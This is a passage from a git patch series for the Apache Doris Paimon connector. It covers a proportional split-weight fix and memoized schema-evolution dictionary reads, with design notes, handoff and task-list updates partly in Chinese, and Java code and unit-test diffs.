(`enablePaimonTest=false`) — NOT run. `FederationBackendPolicyTest` (existing) already covers the +weight→assignment mapping; the UT proves the weight is now non-standard, which is the regression. diff --git a/plan-doc/designs/FIX-A1-SPLIT-WEIGHT-summary.md b/plan-doc/designs/FIX-A1-SPLIT-WEIGHT-summary.md new file mode 100644 index 00000000000000..75d0b65e224b22 --- /dev/null +++ b/plan-doc/designs/FIX-A1-SPLIT-WEIGHT-summary.md @@ -0,0 +1,63 @@ +# FIX-A1 — proportional split weight on the FE FileSplit — SUMMARY + +> Deviation 4/5 of the P6 deviation→fix batch. Single-task loop: design → design red-team (`wf_c8345c28-ee6`) +> → implement → impl-verify → build+UT (RED→GREEN) → commit. Detail: `FIX-A1-SPLIT-WEIGHT-design.md`. + +## Problem + +`PluginDrivenSplit`'s ctor never set `FileSplit.selfSplitWeight` / `targetSplitSize`, so +`FileSplit.getSplitWeight()` returned `SplitWeight.standard()` (uniform) for every plugin-driven split. +Legacy paimon set both, so `FederationBackendPolicy` distributed splits across BEs by **proportional** +(by-size) weight. Under the SPI all paimon splits got uniform weight — an FE BE-assignment skew (no rows / +route / BE-read / result change). + +## Root cause (the non-obvious gap) + +The task-list framed it as "the weight is already computed, just not threaded." Tracing the real code showed +that holds only for **JNI/count** splits. Two gaps had to be closed: +1. The connector's **native** ranges (`buildNativeRange`) never set `selfSplitWeight` (Builder default 0). + Legacy native sub-splits used `selfSplitWeight = length (+ deletionFile.length())` + (`PaimonSplit:72,112`). Native ORC/Parquet is the *default* read path, so leaving it 0 would have made + every native split's weight `clamp(0/denom)=0.01` (uniform) — defeating the fix. +2. The weight **denominator** (legacy `PaimonScanNode:499` = `fileSplitSize>0 ? : max_file_split_size`, + 64 MB default) is a *different* value from the connector's existing file-splitting `targetSplitSize`, and + was carried nowhere. + +## Fix + +- **SPI `ConnectorScanRange`**: two new default getters `getSelfSplitWeight()` / `getTargetSplitSize()`, + sentinel `-1` = "not provided". Connector-agnostic — all 6 non-paimon impls (jdbc/es/trino/maxcompute/ + hive/hudi) inherit `-1` → keep `standard()` (no regression). +- **`PluginDrivenSplit` ctor**: set the FileSplit fields only when `weight >= 0 && target > 0` (`0` is a + real weight; `target > 0` guards div-by-zero). Generic, no source-specific branching. +- **`PaimonScanRange`**: new `targetSplitSize` field (default `-1`) + Builder + `@Override + getTargetSplitSize()`; `getSelfSplitWeight()` marked `@Override`. +- **`PaimonScanPlanProvider`**: `resolveSplitWeightDenominator(session)` (exact legacy formula), computed + once and threaded as `weightDenominator` (named to avoid transposition with the file-split target) to + every builder; `buildNativeRange` now sets `selfSplitWeight = length + DV` and `targetSplitSize = + weightDenominator`; JNI/count add `targetSplitSize`. Applied to every split type incl. count pushdown. + +Legacy parity verified exactly by the design red-team (4 lenses, all "design sound"): native `length+DV`, +denominator `fileSplitSize>0 ? : 64MB`, JNI/count `Σ fileSize`/`rowCount`, `fromProportion(clamp(w/T, +0.01,1.0))` math. FE-only — the BE-thrift `paimon.self_split_weight` (A3) stays gated on `paimonSplit != null`. + +## Tests (RED→GREEN; design red-team's 6 actionable findings all folded in) + +- **fe-core `PluginDrivenSplitWeightTest`** (the regression): `W=50,T=100→rawValue 50`; `W=1→clamp 1`; + `W=0→clamp 1` (the `>=0` gate); `-1/-1→standard 100`; one-field-only → standard. Exact `getRawValue()` + asserts so RED (standard 100) ≠ GREEN. +- **fe-connector-api `ConnectorScanRangeWeightDefaultsTest`**: defaults are `-1` (no-regression sentinel). +- **connector `PaimonScanPlanProviderTest`** (+5): Builder sentinel/round-trip; `buildNativeRange` weight + `=length+DV` + denominator; `buildNativeRanges` positional-swap guard (split count follows the file-split + target, every range carries the denominator); count-pushdown (target 0) still carries the denominator; + `resolveSplitWeightDenominator` legacy formula. Updated the 6 existing changed-signature call-sites. + +## Result + +fe-connector-api 44/0, fe-connector-paimon 298/0/1skip (PaimonScanPlanProviderTest 57/0, +5 A1), fe-core +`PluginDrivenSplitWeightTest` 5/0; checkstyle 0; import-check 0; clean rebuild BUILD SUCCESS. **RED-verified +by mutation runs:** fe-core ctor-gate-off → the 3 proportional cases fail (`expected 50/1/1, got 100`=standard), +the 2 no-weight cases stay green; connector native-weight-drop / sentinel→0 / denominator→0 / arg-swap each → +its target test fails. Design red-team `wf_c8345c28-ee6` (4 lenses, all sound, 6 actionable folded in); +impl-verify `wf_3381cfaa-205` (2 lenses, both COMMIT_AS_IS, 0 actionable). e2e gated (`enablePaimonTest=false`) +— NOT run. Next deviation: **B-R2-be** (last of the 5). From bb489252a4e7b370115d6a95661973e3fef239d7 Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 19 Jun 2026 16:36:16 +0800 Subject: [PATCH 118/128] =?UTF-8?q?docs(catalog-spi):=20P6=20A1=20(split-w?= =?UTF-8?q?eight)=20fix=20done=20=E2=86=92=20HANDOFF=20next=20=3D=20B-R2-b?= =?UTF-8?q?e=20(last=20of=205)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/HANDOFF.md | 34 +++++++++++++++++------- plan-doc/task-list-P6-deviation-fixes.md | 18 +++++++++++-- 2 files changed, 41 insertions(+), 11 deletions(-) diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index d5770e4bcd8020..f15ddb772f5656 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -6,7 +6,7 @@ --- -# 🎯 下一个 session 的任务 — **A1(插件 split 比例权重,⚠️ FE 调度回归)→ 见 `task-list-P6-deviation-fixes.md`**(5 个 deviation→fix:**A3 ✅ `5fa47c27eb8` / A2 ✅ `1935748d6c3` / B-MC2 ✅ `10284edbf88` 已完成**,剩 A1 / B-R2-be,逐一修;建议序 A1→B-R2-be) +# 🎯 下一个 session 的任务 — **B-R2-be(schema-evolution 字典收窄到规划 split 的 schema_id,⚠️ NO PERF REGRESSION + BE-fail-loud 守卫)→ 见 `task-list-P6-deviation-fixes.md`**(5 个 deviation→fix:**A3 ✅ `5fa47c27eb8` / A2 ✅ `1935748d6c3` / B-MC2 ✅ `10284edbf88` / A1 ✅ `9d687145a28` 已完成**,剩 B-R2-be 一项即清零本批) > **进度(2026-06-19)**:P6 发现项按 `task-list-P6-fixes.md` 的 prioritized list 逐个修(单任务循环: > design → 红队 → 实现 → impl 验证 → build+UT → commit)。 @@ -18,6 +18,19 @@ > **RED→GREEN 两次独立跑验证**:未修代码 weight-0 测失败 1,修后 3/0);283/0/0/1skip + checkstyle0 + import0;design 红队 > `wf_3f2cd605-2a8`(9 候选→0-actionable on code)、impl-verify **APPROVE**;e2e gated 未跑。详见 > `designs/FIX-A3-SELF-SPLIT-WEIGHT-{design,summary}.md`。 +> **✅ A1 (MINOR, FE 调度回归, deviation 4/5) `9d687145a28`**:把连接器算好的比例 split weight 接到 FE `FileSplit` +> 调度字段(`FederationBackendPolicy` 按大小分配,legacy parity;FE BE-分配 only,不改行/路由/BE读/结果)。SPI +> `ConnectorScanRange` 加默认 `getSelfSplitWeight()`/`getTargetSplitSize()`(哨兵 -1);`PluginDrivenSplit` ctor +> 仅当 `weight>=0 && target>0` 时填字段(通用,别的连接器继承 -1→保持 `standard()` 无回退);`PaimonScanRange` 携 +> `targetSplitSize`(Builder 默认 -1)+ `@Override` 两 getter;`PaimonScanPlanProvider` 算 `resolveSplitWeightDenominator` +> (= legacy `fileSplitSize>0 ? : max_file_split_size` 64MB)一次并把 `weightDenominator` 穿到每个 builder。**task-list 漏的 +> 关键缺口(靠追 legacy 抓出)**:native 范围从不设 `selfSplitWeight`(默认 0)——legacy 用 `length(+DV)`(`PaimonSplit:72,112`), +> native 是默认路径,weight=0 会 clamp 0.01(均匀)使修复失效;故 `buildNativeRange` 现设 `length+DV`+denominator。FE-only +> (BE-thrift `paimon.self_split_weight` 仍 A3-gated on `paimonSplit`)。新 `PluginDrivenSplitWeightTest`(fe-core,5)+ +> `ConnectorScanRangeWeightDefaultsTest`(api)+5 `PaimonScanPlanProviderTest`+6 改签名调用点;各由独立 mutation +> **RED→GREEN 验证**(ctor-gate/native-weight/sentinel/denominator/swap);api 44/0+paimon 298/0/1skip+fe-core 5/0; +> checkstyle0+import0;design 红队 `wf_c8345c28-ee6`(4 lens sound,6 actionable 已折叠)、impl-verify `wf_3381cfaa-205` +> (2 lens 全 COMMIT_AS_IS,0 actionable);e2e gated 未跑。详见 `designs/FIX-A1-SPLIT-WEIGHT-{design,summary}.md`。 > **✅ B-MC2 (NIT, CACHE-P1, deviation 3/5, ⚠️NO PERF REGRESSION) `10284edbf88`**:恢复 time-travel > schema-at-snapshot 的跨查询二级缓存(SPI cutover CACHE-P1 丢弃)。新连接器侧 `PaimonSchemaAtMemo` > (`ConcurrentHashMap`,loader 在锁外 + best-effort clear-on-overflow 界), @@ -64,13 +77,11 @@ > `PaimonMetadataOps:340` 完全一致(且所有其它连接器都 propagate),原先吞成 emptyList 且注释谎称 parity。280/0 paimon(+1 > gated skip)+16/0+3/0+14/0+12/0;fe-core 编译过;checkstyle 0;import-check 干净;design+impl 两道红队均 0-actionable;e2e gated。 > 详见 `designs/FIX-C4-R2-R3-CATALOG-{design,summary}.md`(design 红队 `wf_444e33b9-5c6`、impl 红队 `wf_b3d35e64-6b9`)。 -> **下一个 = A1(A3 `5fa47c27eb8` / A2 `1935748d6c3` / B-MC2 `10284edbf88` 已完成);剩 2 个 deviation→fix(用户决定修,非接受)**:逐一走单任务循环 -> (详单见 **`task-list-P6-deviation-fixes.md`**,剩余建议序 A1→B-R2-be):**A1** 插件 split 比例权重 -> (SPI `ConnectorScanRange` 加 `getSelfSplitWeight/getTargetSplitSize` + `PluginDrivenSplit` ctor 回填,连接器已算好只是没传 FE -> FileSplit;FE 调度回归,BE 读/路由/结果不变);**B-R2-be** schema-evolution 字典收窄到 +> **下一个 = B-R2-be(A3 `5fa47c27eb8` / A2 `1935748d6c3` / B-MC2 `10284edbf88` / A1 `9d687145a28` 已完成);剩 1 个 deviation→fix(用户决定修,非接受)**:走单任务循环 +> (详单见 **`task-list-P6-deviation-fixes.md`**):**B-R2-be** schema-evolution 字典收窄到 > 规划 split 的文件 schema_id(= legacy,K≤N 无回退;守卫=覆盖每个 `:483` 发的 per-file schema_id 否则 BE 硬崩;注意 > getScanNodeProperties vs planScan 次序——需把 id 集从 planScan 透传,勿在 props 里重枚举 split)。 -> ⚠️ **B-R2-be 硬约束 = 不得有性能回退**:design 必须复现 task-list 的无回退论证、红队必须验证(B-MC2 同约束已照此完成)。**这 2 项做完,再回到 P6-DEVIATIONS +> ⚠️ **B-R2-be 硬约束 = 不得有性能回退**:design 必须复现 task-list 的无回退论证、红队必须验证(B-MC2 同约束已照此完成)。**这 1 项做完,再回到 P6-DEVIATIONS > 余项**(剩余 MINOR/NIT + `PluginDrivenExternalCatalog:140` 吞异常 → `deviations-log.md` 签字)即清零 P6-fixes 批。 paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口线,2 波,零历史先验)**已完成**。 @@ -131,8 +142,13 @@ paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口 `getTableSchema(snapshot)` schemaId>=0 臂 memo 只包 `schemaAt` 读、`ConnectorTableSchema` 每查询重建(红队 MAJOR:缓存 原始 `PaimonSchemaSnapshot` 非 built schema 以保 live coreOptions);+3 Mvcc UT + 新 `PaimonSchemaAtMemoTest`(3) 各 RED→GREEN; 293/0/0/1skip。详见 `designs/FIX-B-MC2-SCHEMA-AT-MEMO-{design,summary}.md`(design 红队 `wf_903bf4e9-3a4`、impl-verify `wf_67804f35-d5e`)。 - - **剩 2 个 deviation→fix(下一个 = A1,用户决定修)**:A1 + B-R2-be,逐一走单任务循环。完整详单(机制/ - 修法/文件/**B-R2-be 的无回退论证**/测试意图)见 **`task-list-P6-deviation-fixes.md`**。建议序 A1→B-R2-be。 + - ✅ **A1**(MINOR FE 调度回归)— **DONE `9d687145a28`**:SPI `ConnectorScanRange` 加 `getSelfSplitWeight`/ + `getTargetSplitSize`(哨兵 -1);`PluginDrivenSplit` ctor 仅 `weight>=0 && target>0` 填 FileSplit 权重; + `PaimonScanRange` 携 `targetSplitSize`(默认 -1);`PaimonScanPlanProvider` 算 denominator(legacy 64MB 公式) + 穿到每 builder + **native 范围补 `selfSplitWeight=length+DV`**(task-list 漏的关键缺口,native 是默认路径否则均匀)。 + fe-core 5 + api 1 + 连接器 5 新 UT 各 RED→GREEN;298/0/1skip+5/0+44/0;两道红队全过。详见 `designs/FIX-A1-SPLIT-WEIGHT-*.md`。 + - **剩 1 个 deviation→fix(下一个 = B-R2-be,用户决定修)**:B-R2-be,走单任务循环。完整详单(机制/ + 修法/文件/**B-R2-be 的无回退论证**/测试意图)见 **`task-list-P6-deviation-fixes.md`**。 - **P6-DEVIATIONS 余项(5 项之后,本批最后一项)**:未转 fix 的剩余 MINOR/NIT 刻意偏离 + wave2 新增 + `PluginDrivenExternalCatalog:140` 吞 authenticator-wiring 异常(R3/R4/R5/R6 residual 属 B8 清理、2 BLOCKER 属 B8 护栏, 均不在此)。逐条记入新建 `deviations-log.md` accept-as-deviation(含用户签字)。 @@ -158,7 +174,7 @@ paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口 --- # 📦 仓库 / 进度状态 -- **HEAD = `10284edbf88`**(FIX-B-MC2 schema-at-snapshot memo;前序 `1935748d6c3` A2、`5fa47c27eb8` A3、`82b6de0de98` C4/R2/R3、`f652b40d210` R1-table、`44499f073e8` R3-residual、`e95128aed5b` C2 HDFS XML、`9967846ef64` C1 MinIO)。当前分支 **`catalog-spi-07-paimon`**(非 master); +- **HEAD = `9d687145a28`**(FIX-A1 split-weight;前序 `10284edbf88` B-MC2、`1935748d6c3` A2、`5fa47c27eb8` A3、`82b6de0de98` C4/R2/R3、`f652b40d210` R1-table、`44499f073e8` R3-residual、`e95128aed5b` C2 HDFS XML、`9967846ef64` C1 MinIO)。当前分支 **`catalog-spi-07-paimon`**(非 master); remote `master-catalog-spi-07-paimon`(= PR [#64445](https://github.com/apache/doris/pull/64445) head)仍在 `82b6de0de98`, **本地领先:A3 起的 deviation fix commits 尚未 push** → 待本批 deviation fix 做完,session 收尾一次性 force-with-lease push + PR 评论 `run buildall`(见 §Commit 须知 / memory `catalog-spi-07-paimon-branch-pr-workflow`)。 diff --git a/plan-doc/task-list-P6-deviation-fixes.md b/plan-doc/task-list-P6-deviation-fixes.md index a4678420224e69..400d1d6ab0fceb 100644 --- a/plan-doc/task-list-P6-deviation-fixes.md +++ b/plan-doc/task-list-P6-deviation-fixes.md @@ -15,7 +15,7 @@ ## Suggested order (independent; smallest blast radius first) -A3 → A2 → B-MC2 → A1 → B-R2-be (✅ A3 / ✅ A2 / ✅ B-MC2 done; next = **A1**, then B-R2-be) +A3 → A2 → B-MC2 → A1 → B-R2-be (✅ A3 / ✅ A2 / ✅ B-MC2 / ✅ A1 done; next = **B-R2-be**, last of the 5) --- @@ -63,7 +63,21 @@ A3 → A2 → B-MC2 → A1 → B-R2-be (✅ A3 / ✅ A2 / ✅ B-MC2 done; next ## A1 — Plugin splits get uniform split weight (legacy = proportional) (MINOR / regression) -- [ ] **A1** +- [x] **A1** — DONE `9d687145a28`. SPI `ConnectorScanRange` gained default getters + `getSelfSplitWeight()`/`getTargetSplitSize()` (sentinel -1); `PluginDrivenSplit` ctor sets the FileSplit + weight fields when `weight>=0 && target>0` (generic, connector-agnostic → other connectors keep + `standard()`); `PaimonScanRange` carries `targetSplitSize` (Builder default -1) + `@Override` both getters; + `PaimonScanPlanProvider` computes `resolveSplitWeightDenominator` (= legacy `fileSplitSize>0 ? : + max_file_split_size` 64MB) once and threads `weightDenominator` to every builder. **Key gap the task-list + missed (caught by tracing legacy):** native ranges never set `selfSplitWeight` (default 0) — legacy used + `length (+DV)` (`PaimonSplit:72,112`); since native is the default path, weight 0 would clamp to 0.01 + (uniform) and defeat the fix. So `buildNativeRange` now sets `selfSplitWeight = length + DV` + the + denominator. FE-only (BE-thrift `paimon.self_split_weight` stays A3-gated on `paimonSplit`). New + `PluginDrivenSplitWeightTest` (fe-core, 5) + `ConnectorScanRangeWeightDefaultsTest` (api) + 5 + `PaimonScanPlanProviderTest` + 6 updated call-sites; each RED-verified by a separate mutation + (ctor-gate / native-weight / sentinel / denominator / swap). api 44/0 + paimon 298/0/1skip + fe-core 5/0; + checkstyle 0; import-check 0. design red-team `wf_c8345c28-ee6` (4 lenses sound, 6 actionable folded in), + impl-verify `wf_3381cfaa-205` (2 lenses COMMIT_AS_IS). e2e gated. See `designs/FIX-A1-SPLIT-WEIGHT-*.md`. - **Finding:** report §R1 (scan). `PluginDrivenSplit` ctor (`PluginDrivenSplit.java:39-48`) forwards path/start/length/fileSize/modTime/hosts/partitionValues to `FileSplit` but **never sets `selfSplitWeight` / `targetSplitSize`**, so `FileSplit.getSplitWeight()` hits the null branch → `SplitWeight.standard()` (uniform). From 60ed665c4dc73a5e95af0ca59c1ebaad99a95b7c Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 19 Jun 2026 18:55:00 +0800 Subject: [PATCH 119/128] =?UTF-8?q?fix:=20FIX-B-R2-be=20=E2=80=94=20memoiz?= =?UTF-8?q?e=20the=20schema-evolution=20dict's=20per-schema-id=20reads?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Root cause: buildSchemaEvolutionParam builds BE's history_schema_info dict by reading EVERY committed schema (schemaManager.listAllIds() + schema(id).fields()) on every scan, even when the query's files touch a single schema. Legacy added entries lazily per referenced file schema_id. The task-list's "narrow to referenced ids" is architecturally infeasible connector-only and BE-crash-prone: getScanPlanProvider() returns a NEW provider per call (so planScan's split schema_ids can't reach the dict build); the dict builds lazily and often BEFORE splits are planned; the referenced set is per-scan; the generic bridge must not collect paimon.schema_id; re-planning in props is forbidden (new I/O); and an under-covering set hard-crashes BE (table_schema_change_helper.h fail-loud, cf. CI 969249). The user chose Option A: memoize the reads, keep the eager superset emission. Fix: keep listAllIds() and the dict emission BYTE-IDENTICAL (full superset always covers any file's schema_id -> zero BE-crash risk); only the per-schema-id field READ is served from a connector-level immutable memo. Reuse the existing B-MC2 PaimonSchemaAtMemo (it already caches (handle,schemaId)->schema fields, write-once, cleared on REFRESH; the cached fact is identical, so one cache serves both the time-travel path and the dict). PaimonScanPlanProvider gains a package-private 4-arg ctor taking the memo (2/3-arg ctors delegate with a fresh memo -> existing sites unchanged); buildSchemaEvolutionParam takes the handle and memo-wraps the listAllIds loop with a DIRECT-read loader (schemaManager.schema(id) -> PaimonSchemaSnapshot, NOT catalogOps.schemaAt, so real-table+fake-catalogOps tests are unaffected); the -1 current entry stays a live read. PaimonConnector.getScanPlanProvider() injects the same per-catalog memo getMetadata uses. Consistency (same key -> same value across both features) verified by design red-team + impl-verify: the cached fact is the write-once committed schema- file, identical regardless of which Table instance's schemaManager reads it; MemoKey excludes scanOptions and mirrors PaimonTableHandle identity exactly; B-MC2 never writes a $ro/sys key. No-regression: miss = today's read + O(1) put; hit skips the read; loader exceptions propagate uncached (fail-loud). Order-independent. Tests: +5 PaimonScanPlanProviderTest (memo-populated / sentinel-HIT / byte-identical-vs-baseline / force-jni-empty / connector-wiring), each RED-verified by a separate mutation (memo-bypass, drop-injection). Full paimon module 303/0/1skip, checkstyle 0, import-check 0. Connector-only (no fe-core/SPI/BE change). e2e gated (enablePaimonTest=false) NOT run. Design + summary: plan-doc/designs/FIX-B-R2-BE-SCHEMA-DICT-MEMO-{design,summary}.md (design red-team wf_222e1abd-655, impl-verify COMMIT_AS_IS). Last of the 5 P6 deviation fixes. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../connector/paimon/PaimonConnector.java | 4 +- .../paimon/PaimonScanPlanProvider.java | 40 ++++- .../paimon/PaimonScanPlanProviderTest.java | 159 ++++++++++++++++++ .../FIX-B-R2-BE-SCHEMA-DICT-MEMO-design.md | 147 ++++++++++++++++ .../FIX-B-R2-BE-SCHEMA-DICT-MEMO-summary.md | 65 +++++++ 5 files changed, 409 insertions(+), 6 deletions(-) create mode 100644 plan-doc/designs/FIX-B-R2-BE-SCHEMA-DICT-MEMO-design.md create mode 100644 plan-doc/designs/FIX-B-R2-BE-SCHEMA-DICT-MEMO-summary.md diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java index c8916a9907ef57..c0229e87f10c2e 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java @@ -105,8 +105,10 @@ public ConnectorMetadata getMetadata(ConnectorSession session) { @Override public ConnectorScanPlanProvider getScanPlanProvider() { + // FIX-B-R2-be: inject the SAME per-catalog schemaAtMemo getMetadata uses, so the schema-evolution + // dict's per-schema-id reads are memoized across scans (and shared with the B-MC2 time-travel path). return new PaimonScanPlanProvider(properties, - new PaimonCatalogOps.CatalogBackedPaimonCatalogOps(ensureCatalog()), context); + new PaimonCatalogOps.CatalogBackedPaimonCatalogOps(ensureCatalog()), context, schemaAtMemo); } /** diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java index d265323432ebbe..634c3180ccaa54 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java @@ -189,6 +189,12 @@ public class PaimonScanPlanProvider implements ConnectorScanPlanProvider { private final Map properties; private final PaimonCatalogOps catalogOps; private final ConnectorContext context; + // FIX-B-R2-be: connector-level (per-catalog, long-lived) memo of the per-committed-schema-id field + // read used by the schema-evolution dict (buildSchemaEvolutionParam). Injected by PaimonConnector so + // it is the SAME instance getMetadata uses (the cached fact (handle,schemaId)->schema fields is shared + // with the B-MC2 time-travel path). The public 2/3-arg ctors give each provider its OWN fresh memo so + // the existing construction sites are unchanged (first build = direct read = pre-fix behavior). + private final PaimonSchemaAtMemo schemaAtMemo; public PaimonScanPlanProvider(Map properties, PaimonCatalogOps catalogOps) { this(properties, catalogOps, null); @@ -196,9 +202,20 @@ public PaimonScanPlanProvider(Map properties, PaimonCatalogOps c public PaimonScanPlanProvider(Map properties, PaimonCatalogOps catalogOps, ConnectorContext context) { + this(properties, catalogOps, context, new PaimonSchemaAtMemo(PaimonSchemaAtMemo.DEFAULT_MAX_SIZE)); + } + + PaimonScanPlanProvider(Map properties, PaimonCatalogOps catalogOps, + ConnectorContext context, PaimonSchemaAtMemo schemaAtMemo) { this.properties = properties; this.catalogOps = catalogOps; this.context = context; + this.schemaAtMemo = schemaAtMemo; + } + + /** Test-only: the schema memo this provider was wired with (to pin the connector injection). */ + PaimonSchemaAtMemo schemaAtMemoForTest() { + return schemaAtMemo; } /** @@ -660,7 +677,7 @@ public Map getScanNodeProperties( // its data files with its field ids, so resolve the underlying base FileStoreTable here. Table schemaDictTable = resolveSchemaDictTable(table, paimonHandle); if (schemaDictTable != null) { - buildSchemaEvolutionParam(schemaDictTable, columns) + buildSchemaEvolutionParam(paimonHandle, schemaDictTable, columns) .ifPresent(v -> props.put(SCHEMA_EVOLUTION_PROP, v)); } } @@ -1295,7 +1312,8 @@ public List getDeleteFiles(TTableFormatFileDesc tableFormatParams) { * fails loud — {@code "miss table/file schema info"} — if a referenced id is absent). Schema reads * that throw are allowed to propagate (fail loud, mirroring legacy {@code putHistorySchemaInfo}).

    */ - private Optional buildSchemaEvolutionParam(Table table, List columns) { + private Optional buildSchemaEvolutionParam(PaimonTableHandle handle, Table table, + List columns) { if (!(table instanceof FileStoreTable)) { return Optional.empty(); } @@ -1306,12 +1324,24 @@ private Optional buildSchemaEvolutionParam(Table table, List the dict always covers any file's schema_id -> no + // BE-crash risk); only the per-id field READ is memoized (FIX-B-R2-be). A committed schemaId's + // schema- file is write-once, so the (handle, schemaId) cache value is immutable; the loader + // keeps the DIRECT read (not catalogOps.schemaAt) and a read that throws propagates uncached + // (fail-loud, mirroring legacy putHistorySchemaInfo). for (Long schemaId : schemaManager.listAllIds()) { - history.add(buildSchemaInfo(schemaId, schemaManager.schema(schemaId).fields(), false)); + List fields = schemaAtMemo.getOrLoad(handle, schemaId, () -> { + TableSchema ts = schemaManager.schema(schemaId); + return new PaimonCatalogOps.PaimonSchemaSnapshot( + ts.fields(), ts.partitionKeys(), ts.primaryKeys()); + }).fields(); + history.add(buildSchemaInfo(schemaId, fields, false)); } return Optional.of(encodeSchemaEvolution(CURRENT_SCHEMA_ID, history)); } diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java index cca733678b6787..f8a5e2ab8c3f1d 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java @@ -1925,4 +1925,163 @@ public void resolveSplitWeightDenominatorMatchesLegacyFormula() { PaimonScanPlanProvider.resolveSplitWeightDenominator(sessionWithProps(withMax)), "unset file_split_size uses the configured max_file_split_size"); } + + // ============= FIX-B-R2-be: memoize the schema-evolution dict's per-schema-id reads ============= + + /** A real single-schema (schema_id=0) keyed FileStoreTable under the @TempDir warehouse. */ + private static FileStoreTable createSingleSchemaTable(Catalog catalog) throws Exception { + catalog.createDatabase("db", false); + Identifier id = Identifier.create("db", "t"); + catalog.createTable(id, Schema.newBuilder() + .column("id", DataTypes.INT()) + .column("name", DataTypes.STRING()) + .primaryKey("id") + .option("bucket", "1") + .build(), false); + return (FileStoreTable) catalog.getTable(id); + } + + private static PaimonTableHandle plainHandle() { + return new PaimonTableHandle("db", "t", Collections.emptyList(), Collections.emptyList()); + } + + @Test + public void schemaEvolutionDictPopulatesSharedMemo(@TempDir Path warehouse) throws Exception { + try (Catalog catalog = new FileSystemCatalog(LocalFileIO.create(), + new org.apache.paimon.fs.Path(warehouse.toUri()))) { + FileStoreTable base = createSingleSchemaTable(catalog); + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.table = base; + PaimonTableHandle handle = plainHandle(); + PaimonSchemaAtMemo memo = new PaimonSchemaAtMemo(PaimonSchemaAtMemo.DEFAULT_MAX_SIZE); + PaimonScanPlanProvider provider = + new PaimonScanPlanProvider(Collections.emptyMap(), ops, null, memo); + + provider.getScanNodeProperties(null, handle, Collections.emptyList(), Optional.empty()); + + // WHY: the K committed-schema reads of the dict build (listAllIds loop) must go through the + // shared memo so repeated scans don't re-read the schema files (FIX-B-R2-be); the -1 current + // entry does NOT (it reads the live table). K=1 for a fresh single-schema table. MUTATION: + // reading schemaManager.schema(id) directly -> memo never populated -> size 0 -> red. + int k = base.schemaManager().listAllIds().size(); + Assertions.assertEquals(1, k, "a fresh table has exactly one committed schema (id 0)"); + Assertions.assertEquals(k, memo.size(), + "every committed-schema read in the dict build must populate the shared memo"); + } + } + + @Test + public void schemaEvolutionDictReadsFromMemoOnHit(@TempDir Path warehouse) throws Exception { + try (Catalog catalog = new FileSystemCatalog(LocalFileIO.create(), + new org.apache.paimon.fs.Path(warehouse.toUri()))) { + FileStoreTable base = createSingleSchemaTable(catalog); + PaimonTableHandle handle = plainHandle(); + + // The real (unseeded) dict. + RecordingPaimonCatalogOps opsReal = new RecordingPaimonCatalogOps(); + opsReal.table = base; + String encodedReal = new PaimonScanPlanProvider(Collections.emptyMap(), opsReal, null, + new PaimonSchemaAtMemo(PaimonSchemaAtMemo.DEFAULT_MAX_SIZE)) + .getScanNodeProperties(null, handle, Collections.emptyList(), Optional.empty()) + .get("paimon.schema_evolution"); + + // Pre-seed a SHARED memo for (handle, schema 0) with a SENTINEL whose fields differ from the + // real schema, so a cache HIT is positively observable in the emitted dict. + PaimonSchemaAtMemo seeded = new PaimonSchemaAtMemo(PaimonSchemaAtMemo.DEFAULT_MAX_SIZE); + seeded.getOrLoad(handle, 0L, () -> new PaimonCatalogOps.PaimonSchemaSnapshot( + Collections.singletonList(new DataField(0, "sentinel_from_memo", DataTypes.INT())), + Collections.emptyList(), Collections.emptyList())); + RecordingPaimonCatalogOps opsSeeded = new RecordingPaimonCatalogOps(); + opsSeeded.table = base; + String encodedSeeded = new PaimonScanPlanProvider(Collections.emptyMap(), opsSeeded, null, seeded) + .getScanNodeProperties(null, handle, Collections.emptyList(), Optional.empty()) + .get("paimon.schema_evolution"); + + // WHY: the dict build must RETURN the cached value for schema 0 (skip the real + // schemaManager.schema(0) read), so the seeded sentinel field surfaces in the dict and the + // encoded string differs from the unseeded real dict. MUTATION: reading directly (bypassing the + // memo) -> the seed is ignored -> encodedSeeded == encodedReal -> red. + Assertions.assertNotNull(encodedReal); + Assertions.assertNotEquals(encodedReal, encodedSeeded, + "a pre-seeded memo entry must surface in the dict, proving the build read from the memo"); + } + } + + @Test + public void schemaEvolutionDictByteIdenticalWithMemo(@TempDir Path warehouse) throws Exception { + try (Catalog catalog = new FileSystemCatalog(LocalFileIO.create(), + new org.apache.paimon.fs.Path(warehouse.toUri()))) { + FileStoreTable base = createSingleSchemaTable(catalog); + PaimonTableHandle handle = 